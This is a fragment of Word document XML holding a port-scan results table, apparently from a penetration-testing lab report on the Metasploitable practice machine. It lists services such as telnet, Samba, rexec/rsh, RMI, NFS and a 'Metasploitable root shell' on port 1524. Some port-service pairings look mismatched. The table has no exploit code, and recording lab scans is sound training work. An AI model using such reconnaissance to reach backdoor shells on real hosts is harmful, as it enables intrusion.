              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649A0955"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0464EA7C"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telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E843A0A" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Linux telnetd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B364CE" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="14F846C2"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77D8739B"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45D7FAEB"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25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C1DBB9"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6D16ED38"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smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23977335" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Postfix smtpd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042B8775" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="7F894E18"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13BF3D3F"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2A9D5947"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53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7176C5E4"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7492B882"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domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BBD36A8" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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64E6A65E" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="00699347"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5185E8C7"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193FF017"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44EA5502"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6CCBFF79"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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6914A550" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>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5816DEAE" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="6C4ACE16"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6D43CB01"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5CCFD8C1"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111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CBB41DA"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26DA0497"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rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14EED7C5"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Microsoft Windows RPC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29D85BE9" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00837B5A" w:rsidRPr="00837B5A" w14:paraId="61BAAE00"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0CD11709" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">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4C6D5D41" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A9F6E2B"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71521C25"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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="760E9DF1" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00837B5A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Samba smbd 3.X - 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29CE12F9" w14:textId="77777777" w:rsidR="00837B5A" w:rsidRPr="00837B5A" w:rsidRDefault="00837B5A" w:rsidP="00837B5A">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59D0" w:rsidRPr="00837B5A" w14:paraId="2CBFAE1A"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51B22425"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3A2179BB"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445</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3147D00E"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2B0569C0" w14:textId="55770EFD"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netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09B6BB3A" w14:textId="43849ADF" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="007B59D0">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>amba smbd 3.X - 4.X</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423956B1" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B59D0" w:rsidRPr="00837B5A" w14:paraId="718302D9"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5086E134" w14:textId="77777777" w:rsidR="007B59D0" w:rsidRPr="00837B5A" w:rsidRDefault="007B59D0" w:rsidP="007B59D0">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-GB"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617A65D9"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512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FA22D7E"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7BB817AE"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exec</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6071776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netkit-rsh rexecd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BFE9ABB"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6D12B07E"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4A11360B"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11531D8A"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513</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CA0ECEF"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04AE505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login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E4CBFF8"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GNU Classpath grmiregistry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="516D66EF"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117AAF0"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0109D188"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70B7F657"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514</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C7260B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2AF439B3"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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765641DE"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6629EA8A"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43F67BB3"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3405AE3A"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58F9B66B"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1099</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED80E6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41AE201F"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rmiregistry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50132BD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0A85A423"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657FBD30"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61F46994"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78832DA7"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1524</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B7B462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233FCC0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binshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6183957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Metasploitable root shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="12" w:space="0" w:color="4472C4"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1009DD69"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54A00EFF"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7089D58B"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72D2200B"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2049</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02242B3A"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409B12D5"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nfs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="182E492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Apache Jserv (Protocol v1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1036" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
